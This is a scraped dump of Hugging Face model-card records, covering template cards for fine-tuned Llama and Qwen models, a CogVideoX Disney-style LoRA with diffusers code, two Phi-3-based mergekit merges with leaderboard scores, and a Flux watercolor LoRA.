- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
a-r-r-o-w/cogvideox-disney-adamw-3000-0.0003 | a-r-r-o-w | 2024-10-10T09:57:45Z | 17 | 8 | diffusers | [
"diffusers",
"text-to-video",
"diffusers-training",
"lora",
"cogvideox",
"cogvideox-diffusers",
"template:sd-lora",
"dataset:Wild-Heart/Disney-VideoGeneration-Dataset",
"base_model:THUDM/CogVideoX-5b",
"base_model:adapter:THUDM/CogVideoX-5b",
"region:us"
] | text-to-video | 2024-10-04T20:21:47Z | ---
datasets:
- Wild-Heart/Disney-VideoGeneration-Dataset
base_model:
- THUDM/CogVideoX-5b
pipeline_tag: text-to-video
library_name: diffusers
tags:
- text-to-video
- diffusers-training
- diffusers
- lora
- cogvideox
- cogvideox-diffusers
- template:sd-lora
---
# CogVideoX LoRA
<Gallery />
## Model description
These are `a-r-r-o-w/cogvideox-disney-adamw-3000-0.0003` LoRA weights for `THUDM/CogVideoX-5b`.
The weights were trained using the [CogVideoX Diffusers trainer](https://github.com/huggingface/diffusers/blob/main/examples/cogvideo/train_cogvideox_lora.py).
Was LoRA for the text encoder enabled? No.
## Download model
[Download the *.safetensors LoRA](https://huggingface.co/a-r-r-o-w/cogvideox-disney-adamw-3000-0.0003/tree/main) in the Files & versions tab.
## Use it with the [🧨 diffusers library](https://github.com/huggingface/diffusers)
```py
from diffusers import CogVideoXPipeline
import torch
pipe = CogVideoXPipeline.from_pretrained("THUDM/CogVideoX-5b", torch_dtype=torch.bfloat16).to("cuda")
pipe.load_lora_weights("a-r-r-o-w/cogvideox-disney-adamw-3000-0.0003", weight_name="pytorch_lora_weights.safetensors", adapter_name="cogvideox-lora")
pipe.set_adapters(["cogvideox-lora"], [1.0])
video = pipe("BW_STYLE A black and white animated scene unfolds with an anthropomorphic goat surrounded by musical notes and symbols, suggesting a playful environment. Mickey Mouse appears, leaning forward in curiosity as the goat remains still. The goat then engages with Mickey, who bends down to converse or react. The dynamics shift as Mickey grabs the goat, potentially in surprise or playfulness, amidst a minimalistic background. The scene captures the evolving relationship between the two characters in a whimsical, animated setting, emphasizing their interactions and emotions", guidance_scale=6, use_dynamic_cfg=True).frames[0]
```
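The snippet above returns raw frames; a short follow-up for writing them to disk (the fps value is a typical choice, not prescribed by the card):

```py
from diffusers.utils import export_to_video

export_to_video(video, "output.mp4", fps=8)
```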
For more details, including weighting, merging and fusing LoRAs, check the [documentation on loading LoRAs in diffusers](https://huggingface.co/docs/diffusers/main/en/using-diffusers/loading_adapters)
## License
Please adhere to the licensing terms as described [here](https://huggingface.co/THUDM/CogVideoX-5b/blob/main/LICENSE) and [here](https://huggingface.co/THUDM/CogVideoX-2b/blob/main/LICENSE). |
Trelis/Llama-3.2-1B-Instruct-touch-rugby-synth-1epochs-20241010-095132-distilled | Trelis | 2024-10-10T09:55:09Z | 127 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"trl",
"sft",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-10-10T09:54:32Z | ---
library_name: transformers
tags:
- trl
- sft
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
allknowingroger/Ph3task2-14B | allknowingroger | 2024-10-10T09:49:50Z | 24 | 0 | transformers | [
"transformers",
"safetensors",
"phi3",
"text-generation",
"mergekit",
"merge",
"conversational",
"custom_code",
"arxiv:2212.04089",
"base_model:failspy/Phi-3-medium-4k-instruct-abliterated-v3",
"base_model:merge:failspy/Phi-3-medium-4k-instruct-abliterated-v3",
"base_model:jpacifico/Chocolatine-14B-Instruct-DPO-v1.2",
"base_model:merge:jpacifico/Chocolatine-14B-Instruct-DPO-v1.2",
"license:apache-2.0",
"model-index",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-09-08T07:43:09Z | ---
license: apache-2.0
library_name: transformers
tags:
- mergekit
- merge
base_model:
- jpacifico/Chocolatine-14B-Instruct-DPO-v1.2
- failspy/Phi-3-medium-4k-instruct-abliterated-v3
model-index:
- name: Ph3task2-14B
results:
- task:
type: text-generation
name: Text Generation
dataset:
name: IFEval (0-Shot)
type: HuggingFaceH4/ifeval
args:
num_few_shot: 0
metrics:
- type: inst_level_strict_acc and prompt_level_strict_acc
value: 47.13
name: strict accuracy
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=allknowingroger/Ph3task2-14B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: BBH (3-Shot)
type: BBH
args:
num_few_shot: 3
metrics:
- type: acc_norm
value: 44.08
name: normalized accuracy
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=allknowingroger/Ph3task2-14B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: MATH Lvl 5 (4-Shot)
type: hendrycks/competition_math
args:
num_few_shot: 4
metrics:
- type: exact_match
value: 12.46
name: exact match
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=allknowingroger/Ph3task2-14B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: GPQA (0-shot)
type: Idavidrein/gpqa
args:
num_few_shot: 0
metrics:
- type: acc_norm
value: 10.74
name: acc_norm
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=allknowingroger/Ph3task2-14B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: MuSR (0-shot)
type: TAUR-Lab/MuSR
args:
num_few_shot: 0
metrics:
- type: acc_norm
value: 16.62
name: acc_norm
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=allknowingroger/Ph3task2-14B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: MMLU-PRO (5-shot)
type: TIGER-Lab/MMLU-Pro
config: main
split: test
args:
num_few_shot: 5
metrics:
- type: acc
value: 38.44
name: accuracy
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=allknowingroger/Ph3task2-14B
name: Open LLM Leaderboard
---
# merge
This is a merge of pre-trained language models created using [mergekit](https://github.com/cg123/mergekit).
## Merge Details
### Merge Method
This model was merged using the [task arithmetic](https://arxiv.org/abs/2212.04089) merge method, with [jpacifico/Chocolatine-14B-Instruct-DPO-v1.2](https://huggingface.co/jpacifico/Chocolatine-14B-Instruct-DPO-v1.2) as the base.
### Models Merged
The following models were included in the merge:
* [failspy/Phi-3-medium-4k-instruct-abliterated-v3](https://huggingface.co/failspy/Phi-3-medium-4k-instruct-abliterated-v3)
### Configuration
The following YAML configuration was used to produce this model:
```yaml
models:
- model: jpacifico/Chocolatine-14B-Instruct-DPO-v1.2
parameters:
weight: 1.0
- model: failspy/Phi-3-medium-4k-instruct-abliterated-v3
parameters:
weight: 1.0
merge_method: task_arithmetic
base_model: jpacifico/Chocolatine-14B-Instruct-DPO-v1.2
parameters:
normalize: true
dtype: float16
```
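As a rough illustration of what the task arithmetic method does with this configuration (a hand-written sketch only, not mergekit's actual implementation): each fine-tuned model contributes a task vector (its parameter delta from the base), and the weighted, optionally normalized sum of those deltas is added back onto the base weights.

```python
# Illustrative sketch of task-arithmetic merging on state_dicts (not mergekit's code).
import torch

def task_arithmetic_merge(base_sd, model_sds, weights, normalize=True):
    """base_sd / model_sds map parameter names to tensors; weights mirrors the YAML above."""
    total = sum(weights)
    merged = {}
    for name, base_param in base_sd.items():
        delta = torch.zeros_like(base_param)
        for sd, w in zip(model_sds, weights):
            delta += w * (sd[name] - base_param)  # weighted task vector
        if normalize and total != 0:
            delta /= total  # corresponds to `normalize: true` in the config
        merged[name] = base_param + delta
    return merged
```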
# [Open LLM Leaderboard Evaluation Results](https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard)
Detailed results can be found [here](https://huggingface.co/datasets/open-llm-leaderboard/details_allknowingroger__Ph3task2-14B)
| Metric |Value|
|-------------------|----:|
|Avg. |28.25|
|IFEval (0-Shot) |47.13|
|BBH (3-Shot) |44.08|
|MATH Lvl 5 (4-Shot)|12.46|
|GPQA (0-shot) |10.74|
|MuSR (0-shot) |16.62|
|MMLU-PRO (5-shot) |38.44|
|
allknowingroger/Ph3della5-14B | allknowingroger | 2024-10-10T09:49:39Z | 5,386 | 0 | transformers | [
"transformers",
"safetensors",
"phi3",
"text-generation",
"mergekit",
"merge",
"conversational",
"custom_code",
"base_model:jpacifico/Chocolatine-14B-Instruct-DPO-v1.1",
"base_model:merge:jpacifico/Chocolatine-14B-Instruct-DPO-v1.1",
"base_model:jpacifico/Chocolatine-14B-Instruct-DPO-v1.2",
"base_model:merge:jpacifico/Chocolatine-14B-Instruct-DPO-v1.2",
"license:apache-2.0",
"model-index",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-09-05T16:24:51Z | ---
license: apache-2.0
library_name: transformers
tags:
- mergekit
- merge
base_model:
- jpacifico/Chocolatine-14B-Instruct-DPO-v1.2
- jpacifico/Chocolatine-14B-Instruct-DPO-v1.1
model-index:
- name: Ph3della5-14B
results:
- task:
type: text-generation
name: Text Generation
dataset:
name: IFEval (0-Shot)
type: HuggingFaceH4/ifeval
args:
num_few_shot: 0
metrics:
- type: inst_level_strict_acc and prompt_level_strict_acc
value: 47.99
name: strict accuracy
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=allknowingroger/Ph3della5-14B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: BBH (3-Shot)
type: BBH
args:
num_few_shot: 3
metrics:
- type: acc_norm
value: 48.41
name: normalized accuracy
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=allknowingroger/Ph3della5-14B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: MATH Lvl 5 (4-Shot)
type: hendrycks/competition_math
args:
num_few_shot: 4
metrics:
- type: exact_match
value: 14.35
name: exact match
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=allknowingroger/Ph3della5-14B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: GPQA (0-shot)
type: Idavidrein/gpqa
args:
num_few_shot: 0
metrics:
- type: acc_norm
value: 12.3
name: acc_norm
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=allknowingroger/Ph3della5-14B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: MuSR (0-shot)
type: TAUR-Lab/MuSR
args:
num_few_shot: 0
metrics:
- type: acc_norm
value: 14.36
name: acc_norm
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=allknowingroger/Ph3della5-14B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: MMLU-PRO (5-shot)
type: TIGER-Lab/MMLU-Pro
config: main
split: test
args:
num_few_shot: 5
metrics:
- type: acc
value: 42.08
name: accuracy
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=allknowingroger/Ph3della5-14B
name: Open LLM Leaderboard
---
# merge
This is a merge of pre-trained language models created using [mergekit](https://github.com/cg123/mergekit).
## Merge Details
### Merge Method
This model was merged using the della_linear merge method, with [jpacifico/Chocolatine-14B-Instruct-DPO-v1.2](https://huggingface.co/jpacifico/Chocolatine-14B-Instruct-DPO-v1.2) as the base.
### Models Merged
The following models were included in the merge:
* [jpacifico/Chocolatine-14B-Instruct-DPO-v1.1](https://huggingface.co/jpacifico/Chocolatine-14B-Instruct-DPO-v1.1)
### Configuration
The following YAML configuration was used to produce this model:
```yaml
models:
- model: jpacifico/Chocolatine-14B-Instruct-DPO-v1.2
parameters:
weight: 0.5
density: 0.8
- model: jpacifico/Chocolatine-14B-Instruct-DPO-v1.1
parameters:
weight: 0.5
density: 0.8
merge_method: della_linear
base_model: jpacifico/Chocolatine-14B-Instruct-DPO-v1.2
parameters:
epsilon: 0.05
lambda: 1
int8_mask: true
dtype: float16
tokenizer_source: union
```
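To try the merged checkpoint directly, a minimal transformers loading sketch (untested here; `trust_remote_code=True` follows the repo's `custom_code` tag and may not be needed on recent transformers versions) could look like this:

```python
import torch
from transformers import AutoModelForCausalLM, AutoTokenizer

model_id = "allknowingroger/Ph3della5-14B"
tokenizer = AutoTokenizer.from_pretrained(model_id, trust_remote_code=True)
model = AutoModelForCausalLM.from_pretrained(
    model_id,
    torch_dtype=torch.float16,  # the merge itself was produced in float16
    device_map="auto",
    trust_remote_code=True,
)

prompt = "Explain task vectors in one paragraph."
inputs = tokenizer(prompt, return_tensors="pt").to(model.device)
outputs = model.generate(**inputs, max_new_tokens=128)
print(tokenizer.decode(outputs[0], skip_special_tokens=True))
```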
# [Open LLM Leaderboard Evaluation Results](https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard)
Detailed results can be found [here](https://huggingface.co/datasets/open-llm-leaderboard/details_allknowingroger__Ph3della5-14B)
| Metric |Value|
|-------------------|----:|
|Avg. |29.92|
|IFEval (0-Shot) |47.99|
|BBH (3-Shot) |48.41|
|MATH Lvl 5 (4-Shot)|14.35|
|GPQA (0-shot) |12.30|
|MuSR (0-shot) |14.36|
|MMLU-PRO (5-shot) |42.08|
|
brownyeyez/Mixed-VNPTAI-Qwen2.5-1.5B-v12 | brownyeyez | 2024-10-10T09:48:29Z | 134 | 0 | transformers | [
"transformers",
"safetensors",
"qwen2",
"text-generation",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-10-10T09:43:37Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
Trelis/Llama-3.2-1B-Instruct-touch-rugby-synth-1epochs-20241010-094100-distilled | Trelis | 2024-10-10T09:43:31Z | 128 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"trl",
"sft",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-10-10T09:42:52Z | ---
library_name: transformers
tags:
- trl
- sft
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
bingbangboom/flux-waterscape | bingbangboom | 2024-10-10T09:41:20Z | 1,351 | 14 | diffusers | [
"diffusers",
"flux",
"lora",
"replicate",
"text-to-image",
"en",
"base_model:black-forest-labs/FLUX.1-dev",
"base_model:adapter:black-forest-labs/FLUX.1-dev",
"license:other",
"region:us"
] | text-to-image | 2024-10-09T10:34:12Z | ---
license: other
license_name: flux-1-dev-non-commercial-license
license_link: https://huggingface.co/black-forest-labs/FLUX.1-dev/blob/main/LICENSE.md
language:
- en
tags:
- flux
- diffusers
- lora
- replicate
base_model: black-forest-labs/FLUX.1-dev
pipeline_tag: text-to-image
instance_prompt: watercolor illustration in the style of WTRSCPE003
widget:
- text: "a cat in a field of lavender flowers, watercolor illustration in the style of WTRSCPE003"
output:
url: images/1.png
- text: "a girl wearing a flower crown, standing in a garden ,watercolor illustration in the style of WTRSCPE003"
output:
url: images/2.png
- text: "a white-haired young woman wearing a flower crown, a very large fiery dragon, castle in the background ,watercolor illustration in the style of WTRSCPE003"
output:
url: images/3.png
- text: "a big ferocious tiger, jungle, sunset, watercolor illustration in the style of WTRSCPE0033"
output:
url: images/4.png
- text: "a robot eating ramen in a busy cafe ,watercolor illustration in the style of WTRSCPE003"
output:
url: images/5.png
- text: "a seal holding a beach ball in a pool ,watercolor illustration in the style of WTRSCPE003"
output:
url: images/6.png
---
# flux_waterscape
<Gallery />
<table>
<tr>
<td><img src="./extras/1.png" alt="Example 1" style="width:100%;"></td>
<td><img src="./extras/2a.png" alt="Example 2" style="width:100%;"></td>
<td><img src="./extras/3.png" alt="Example 3" style="width:100%;"></td>
<td><img src="./extras/4a.png" alt="Example 4" style="width:100%;"></td>
</tr>
<tr>
<td><img src="./extras/5.png" alt="Example 5" style="width:100%;"></td>
<td><img src="./extras/6.png" alt="Example 6" style="width:100%;"></td>
<td><img src="./extras/7.png" alt="Example 7" style="width:100%;"></td>
<td><img src="./extras/8.png" alt="Example 8" style="width:100%;"></td>
</tr>
</table>
## Model description
Flux LoRA for creating watercolor-styled illustrations. Use 'watercolor illustration in the style of WTRSCPE003' to trigger the model. Works best with the DEV model (even with fp8). To use with flux1-dev-bnb-nf4, try increasing the LoRA strength (to, say, 1.3) and adjust from there.
## Trigger words
You should use `watercolor illustration in the style of WTRSCPE003` to trigger the image generation.
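A minimal diffusers sketch for generating with this LoRA (the sampler settings below are illustrative defaults, not tuned values from the author):

```python
import torch
from diffusers import FluxPipeline

pipe = FluxPipeline.from_pretrained(
    "black-forest-labs/FLUX.1-dev", torch_dtype=torch.bfloat16
)
pipe.load_lora_weights("bingbangboom/flux-waterscape")
pipe.enable_model_cpu_offload()  # optional: reduces VRAM use at some speed cost

prompt = "a cat in a field of lavender flowers, watercolor illustration in the style of WTRSCPE003"
image = pipe(prompt, num_inference_steps=28, guidance_scale=3.5).images[0]
image.save("waterscape.png")
```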
## Download model
Weights for this model are available in Safetensors format.
[Download](/bingbangboom/flux-waterscape/tree/main) them in the Files & versions tab.
## Training at Replicate
Trained at Replicate using: https://replicate.com/ostris/flux-dev-lora-trainer/train
|
